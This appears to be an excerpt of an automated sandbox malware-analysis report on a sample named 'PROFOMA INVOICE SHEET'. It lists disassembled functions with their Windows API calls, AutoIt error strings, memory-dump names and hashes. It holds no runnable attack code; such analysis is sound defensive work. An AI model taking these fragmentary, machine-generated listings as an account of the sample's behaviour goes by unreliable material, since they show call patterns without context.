                                    • Opcode Fuzzy Hash: a263ebefddc88f80d8c131a27807ddb0b7e3b34f884cf6260ec55d4fcb69d253
                                    • Instruction Fuzzy Hash: C721A475641A197BD71B9A20EE82FFA335DAF20395F44C030FE04AEA85F720ED20C5A5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: NULL Pointer assignment$Not an Object type
                                    • API String ID: 0-572801152
                                    • Opcode ID: 6704eb129c92678ec2c7a8fcdda25e0bde2ea9c65c253d452088bc43489e46df
                                    • Instruction ID: 9d31e27a3acfe5b174e43730b0b72b52cfeaae58d936fd86f35914e256d2888b
                                    • Opcode Fuzzy Hash: 6704eb129c92678ec2c7a8fcdda25e0bde2ea9c65c253d452088bc43489e46df
                                    • Instruction Fuzzy Hash: 5BD1D175A0070A9FDF12EFA8C885BAEB7B5BF48344F1584A9E915EB280E770DD41CB50
                                    APIs
                                    • GetCPInfo.KERNEL32(?,?), ref: 003415CE
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00341651
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 003416E4
                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 003416FB
                                      • Part of subcall function 00333820: RtlAllocateHeap.NTDLL(00000000,?,003D1444,?,0031FDF5,?,?,0030A976,00000010,003D1440,003013FC,?,003013C6,?,00301129), ref: 00333852
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00341777
                                    • __freea.LIBCMT ref: 003417A2
                                    • __freea.LIBCMT ref: 003417AE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                    • String ID:
                                    • API String ID: 2829977744-0
                                    • Opcode ID: c0e4f823134aebe5a1fbea1c01f4319d19bffe6bcbcf4552382723de7b52d546
                                    • Instruction ID: ab40c8a19a3b5fa74c4665d845b3b6dd0f01e27a6a935fd913fe48a9d9e51806
                                    • Opcode Fuzzy Hash: c0e4f823134aebe5a1fbea1c01f4319d19bffe6bcbcf4552382723de7b52d546
                                    • Instruction Fuzzy Hash: 3E91D472E10A169ADF228E74C881AEE7BF9EF49350F194659E805EF141D735EC84CB60
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit
                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                    • API String ID: 2610073882-625585964
                                    • Opcode ID: 52b4a8ceb0c2b560a1b33485092aa23a696b62a59079949832ce143e1dde0f77
                                    • Instruction ID: b527525b8b63334701cab00564c24bea81c581e54d5da96b035d12fb0d1f7871
                                    • Opcode Fuzzy Hash: 52b4a8ceb0c2b560a1b33485092aa23a696b62a59079949832ce143e1dde0f77
                                    • Instruction Fuzzy Hash: 12919171A00316AFDF26DFA5C844FAEBBB8EF46710F108599F515AB680E7709941CFA0
                                    APIs
                                    • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0037125C
                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00371284
                                    • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 003712A8
                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003712D8
                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0037135F
                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 003713C4
                                    • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00371430
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ArraySafe$Data$Access$UnaccessVartype
                                    • String ID:
                                    • API String ID: 2550207440-0
                                    • Opcode ID: bc897d4408aa08d9d206d0f1b865c66da6fd7f61fd79ee48f48f6db05f3c5997
                                    • Instruction ID: c83db2d662a90f6ec325552c1bbfc73aeea11f38579ed6595e2c22bc5b50efd5
                                    • Opcode Fuzzy Hash: bc897d4408aa08d9d206d0f1b865c66da6fd7f61fd79ee48f48f6db05f3c5997
                                    • Instruction Fuzzy Hash: 8A912976A002059FDB23DF99C884BBEB7B9FF45310F158429E904EB292D778E941CB50
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ObjectSelect$BeginCreatePath
                                    • String ID:
                                    • API String ID: 3225163088-0
                                    • Opcode ID: 002eb82d9ed3da45ff4bcc10e28d955b62d06649fd32737360d19f1b6d87c1e7
                                    • Instruction ID: 9d5372c2557cca68b85a12085c046ea2baea0603ba270eebbf9220cc8a327391
                                    • Opcode Fuzzy Hash: 002eb82d9ed3da45ff4bcc10e28d955b62d06649fd32737360d19f1b6d87c1e7
                                    • Instruction Fuzzy Hash: AE916A71D00219EFCB16CFA9CC84AEEBBB9FF49320F144446E915B7251D775AA81CBA0
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 0038396B
                                    • CharUpperBuffW.USER32(?,?), ref: 00383A7A
                                    • _wcslen.LIBCMT ref: 00383A8A
                                    • VariantClear.OLEAUT32(?), ref: 00383C1F
                                      • Part of subcall function 00370CDF: VariantInit.OLEAUT32(00000000), ref: 00370D1F
                                      • Part of subcall function 00370CDF: VariantCopy.OLEAUT32(?,?), ref: 00370D28
                                      • Part of subcall function 00370CDF: VariantClear.OLEAUT32(?), ref: 00370D34
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                    • API String ID: 4137639002-1221869570
                                    • Opcode ID: a49034cd4a2a2cf27f1844123b0a7fed591be8246adfc89553622954334cc4ec
                                    • Instruction ID: 52dfa40a5a6726e45250993d4cdff1d233c1a741cbad68753cba5fe901373e7c
                                    • Opcode Fuzzy Hash: a49034cd4a2a2cf27f1844123b0a7fed591be8246adfc89553622954334cc4ec
                                    • Instruction Fuzzy Hash: 2F917C756083059FC706EF28C49096AB7E4FF89714F14886EF8899B351DB31EE45CB92
                                    APIs
                                      • Part of subcall function 0036000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0035FF41,80070057,?,?,?,0036035E), ref: 0036002B
                                      • Part of subcall function 0036000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0035FF41,80070057,?,?), ref: 00360046
                                      • Part of subcall function 0036000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0035FF41,80070057,?,?), ref: 00360054
                                      • Part of subcall function 0036000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0035FF41,80070057,?), ref: 00360064
                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00384C51
                                    • _wcslen.LIBCMT ref: 00384D59
                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00384DCF
                                    • CoTaskMemFree.OLE32(?), ref: 00384DDA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                    • String ID: NULL Pointer assignment
                                    • API String ID: 614568839-2785691316
                                    • Opcode ID: a57f4250e996ef944ea17eaa2aee0ff16e8b9f11f59438110d290bb7671dd403
                                    • Instruction ID: c8b8bd1d5ae45d51c5bc1e54e4890ac95f4f3ed126a17c686e045c1e36340a26
                                    • Opcode Fuzzy Hash: a57f4250e996ef944ea17eaa2aee0ff16e8b9f11f59438110d290bb7671dd403
                                    • Instruction Fuzzy Hash: 3B911C71D0131DAFDF16EFA4D891AEEB7B8BF04314F10816AE515AB291DB309A44CF60
                                    APIs
                                    • GetMenu.USER32(?), ref: 00392183
                                    • GetMenuItemCount.USER32(00000000), ref: 003921B5
                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003921DD
                                    • _wcslen.LIBCMT ref: 00392213
                                    • GetMenuItemID.USER32(?,?), ref: 0039224D
                                    • GetSubMenu.USER32(?,?), ref: 0039225B
                                      • Part of subcall function 00363A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00363A57
                                      • Part of subcall function 00363A3D: GetCurrentThreadId.KERNEL32 ref: 00363A5E
                                      • Part of subcall function 00363A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,003625B3), ref: 00363A65
                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 003922E3
                                      • Part of subcall function 0036E97B: Sleep.KERNEL32 ref: 0036E9F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                    • String ID:
                                    • API String ID: 4196846111-0
                                    • Opcode ID: 9a0ac2f52c0403e078af62ca0ee669db04e0ccf349a1ef409239bd2d9b1d5f9e
                                    • Instruction ID: a2270adf335e99161333680f0a0a86175a5605fdbc74b9409472561b949ef40a
                                    • Opcode Fuzzy Hash: 9a0ac2f52c0403e078af62ca0ee669db04e0ccf349a1ef409239bd2d9b1d5f9e
                                    • Instruction Fuzzy Hash: D771AE75E00605AFCF16EFA9C881AAEB7F5EF48310F158859E856EB341DB34ED418B90
                                    APIs
                                    • GetParent.USER32(?), ref: 0036AEF9
                                    • GetKeyboardState.USER32(?), ref: 0036AF0E
                                    • SetKeyboardState.USER32(?), ref: 0036AF6F
                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 0036AF9D
                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 0036AFBC
                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 0036AFFD
                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0036B020
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: 601b25b5dcff76a0eef68f12b314fdad97c2beb01cfe71bca58fa1569d1b063b
                                    • Instruction ID: 6566915110b186ccff45405e796c461d0d140f6ad9ea70a8229ec571795cb1eb
                                    • Opcode Fuzzy Hash: 601b25b5dcff76a0eef68f12b314fdad97c2beb01cfe71bca58fa1569d1b063b
                                    • Instruction Fuzzy Hash: 8F51C3A0A147D53DFB3742348C45BBABEE96B06304F09C489E1D5998C7C3E9ACC4DB52
                                    APIs
                                    • GetParent.USER32(00000000), ref: 0036AD19
                                    • GetKeyboardState.USER32(?), ref: 0036AD2E
                                    • SetKeyboardState.USER32(?), ref: 0036AD8F
                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0036ADBB
                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0036ADD8
                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0036AE17
                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0036AE38
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessagePost$KeyboardState$Parent
                                    • String ID:
                                    • API String ID: 87235514-0
                                    • Opcode ID: f38d1ab6d42a36ba5b59151578f688754f72f0d3ffc1d1d5274f7a1380bdad31
                                    • Instruction ID: c2c2800a97af4e3f15769a5430b98215f2f0a8a971beffebe2d6d3af4972af44
                                    • Opcode Fuzzy Hash: f38d1ab6d42a36ba5b59151578f688754f72f0d3ffc1d1d5274f7a1380bdad31
                                    • Instruction Fuzzy Hash: DE5108A1604BD53DFB3383348C95B7ABEE85B45300F08C489E1D56A8C7C395EC94EB52
                                    APIs
                                    • GetConsoleCP.KERNEL32(00343CD6,?,?,?,?,?,?,?,?,00335BA3,?,?,00343CD6,?,?), ref: 00335470
                                    • __fassign.LIBCMT ref: 003354EB
                                    • __fassign.LIBCMT ref: 00335506
                                    • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00343CD6,00000005,00000000,00000000), ref: 0033552C
                                    • WriteFile.KERNEL32(?,00343CD6,00000000,00335BA3,00000000,?,?,?,?,?,?,?,?,?,00335BA3,?), ref: 0033554B
                                    • WriteFile.KERNEL32(?,?,00000001,00335BA3,00000000,?,?,?,?,?,?,?,?,?,00335BA3,?), ref: 00335584
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                    • String ID:
                                    • API String ID: 1324828854-0
                                    • Opcode ID: dfb3c40dd2722b6da97651316c0d579499bf986743b2e817880685371d2ea9be
                                    • Instruction ID: b564069b99bebef60b5ac04339064084a988a8dbf5e9bf3382372434871b706f
                                    • Opcode Fuzzy Hash: dfb3c40dd2722b6da97651316c0d579499bf986743b2e817880685371d2ea9be
                                    • Instruction Fuzzy Hash: CA51D771A006499FDB12CFA8D885BEEBBF9EF09300F14451AF556E7291D730EA41CB60
                                    APIs
                                      • Part of subcall function 0038304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0038307A
                                      • Part of subcall function 0038304E: _wcslen.LIBCMT ref: 0038309B
                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00381112
                                    • WSAGetLastError.WSOCK32 ref: 00381121
                                    • WSAGetLastError.WSOCK32 ref: 003811C9
                                    • closesocket.WSOCK32(00000000), ref: 003811F9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                    • String ID:
                                    • API String ID: 2675159561-0
                                    • Opcode ID: ce2d93211b0111773e3b169e6d5188e305e06ec26fdb06be259d88baa2a6184d
                                    • Instruction ID: 65ab8a7a78869c8a3404c5d279928aa8cb0927e0e1e6a6dc74403b257c3ba50c
                                    • Opcode Fuzzy Hash: ce2d93211b0111773e3b169e6d5188e305e06ec26fdb06be259d88baa2a6184d
                                    • Instruction Fuzzy Hash: 1E41F431600204AFDB12AF54C889BAAB7EDEF45764F148199F9059F291C771AE42CBA1
                                    APIs
                                      • Part of subcall function 0036DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0036CF22,?), ref: 0036DDFD
                                      • Part of subcall function 0036DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0036CF22,?), ref: 0036DE16
                                    • lstrcmpiW.KERNEL32(?,?), ref: 0036CF45
                                    • MoveFileW.KERNEL32(?,?), ref: 0036CF7F
                                    • _wcslen.LIBCMT ref: 0036D005
                                    • _wcslen.LIBCMT ref: 0036D01B
                                    • SHFileOperationW.SHELL32(?), ref: 0036D061
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                    • String ID: \*.*
                                    • API String ID: 3164238972-1173974218
                                    • Opcode ID: 862e76ead4355cb711379c4f114e9f300603a08186dca95599a6ed692c0075cf
                                    • Instruction ID: 67c05502dfc9cf282379e37d913040407170f32e5d504f2c0aeceb8111f51e8f
                                    • Opcode Fuzzy Hash: 862e76ead4355cb711379c4f114e9f300603a08186dca95599a6ed692c0075cf
                                    • Instruction Fuzzy Hash: 18415571D452189FDF13EBA4D981AEEB7BCAF08380F0040E6E545EF146EB74A688CB50
                                    APIs
                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00392E1C
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00392E4F
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00392E84
                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00392EB6
                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00392EE0
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00392EF1
                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00392F0B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: LongWindow$MessageSend
                                    • String ID:
                                    • API String ID: 2178440468-0
                                    • Opcode ID: ba064929aec236bf0603a72d53500e977077df7c9fcac46ad8a4bd59728744c0
                                    • Instruction ID: 436c2dcbc04d5836a11a7ef2ab5e51174910b69665539ea21a8338c320eea67f
                                    • Opcode Fuzzy Hash: ba064929aec236bf0603a72d53500e977077df7c9fcac46ad8a4bd59728744c0
                                    • Instruction Fuzzy Hash: 1D310335A05540AFDF22DF18ECD4F6677A8EB4A710F1A1165F9018B2B2CB71AC409B50
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00367769
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0036778F
                                    • SysAllocString.OLEAUT32(00000000), ref: 00367792
                                    • SysAllocString.OLEAUT32(?), ref: 003677B0
                                    • SysFreeString.OLEAUT32(?), ref: 003677B9
                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 003677DE
                                    • SysAllocString.OLEAUT32(?), ref: 003677EC
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                    • String ID:
                                    • API String ID: 3761583154-0
                                    • Opcode ID: 03c2c6262d7839e406321d433fafe76f6ca6738c53fcff6d88cb292b6c0db5c9
                                    • Instruction ID: e1b841131dad0431fc4e433921079644c7cad81da3649e60f0ea916a6e5f7493
                                    • Opcode Fuzzy Hash: 03c2c6262d7839e406321d433fafe76f6ca6738c53fcff6d88cb292b6c0db5c9
                                    • Instruction Fuzzy Hash: 6621C176608219AFDF12EFA8CD88CBB77ACEB09368B448026FA14DB154D674DC418774
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00367842
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00367868
                                    • SysAllocString.OLEAUT32(00000000), ref: 0036786B
                                    • SysAllocString.OLEAUT32 ref: 0036788C
                                    • SysFreeString.OLEAUT32 ref: 00367895
